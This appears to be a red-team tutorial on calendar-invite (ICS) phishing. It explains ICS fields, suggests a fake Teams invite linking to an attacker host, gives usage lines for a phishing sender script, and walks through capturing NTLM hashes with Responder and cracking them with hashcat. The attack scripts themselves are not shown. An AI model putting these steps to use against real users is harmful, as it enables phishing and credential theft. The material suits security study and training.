- Calendar as an Initial Access Vector
- Fields in an ICS file
- Abusing Calendars
- Automated Attack
- Credential Stealing with Responder
MITRE ATT&CK Technique: Phishing (T1566 )
Calendar as an Initial Access Vector
ICS file is a text file
- Begins with a header indicating the version and method of the calendar data being shared
- VEVENT for calendar events,
- VTODO for to-do items, and
- VJOURNAL for journal entries
Fields in an ICS file
Organizer:
ORGANIZER;CN="John Doe":mailto:[email protected]Timings:
DTSTART;TZID=America/New_York:20231015T090000
DTEND;TZID=America/New_York:20231015T100000Description:
DESCRIPTION:Weekly team meeting to discuss project updates and milestones.We can Place our malicious link in the description section of the calendar invite.
ICS FilesAbusing Calendars
We can use a HTML Template that mimics the Teams Meeting Invite, with the meeting link directing to an attacker domain.
Emails can be sent with this command.
Automated Attack
Use the following html, this contains placeholders for:
- {EVENT_TEXT} - Meeting Context
- {EVENT_URL} - Phishing Link
Create an ICS template with placeholders:
Next, use a Python Script to to fill the templates with the values and send the email:
Usage: python fakemeeting.py <smtp_server> <sender_email> <recipient_email> <event_url>
Credential Stealing with Responder
Ensure HTTP Server is ON at /etc/responder/Responder.conf
HTTP = OnStart Responder:
sudo responder -I tun0Send Phishing Email:
python3 fakeics.py <SMTP_SERVER_IP> [email protected] [email protected] http://<tun0_address>When the Victim receives the email and clicks the link, they will be prompted for NTLM login, which will be captured by Responder.
NTLM V2 hash can be cracked with:
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt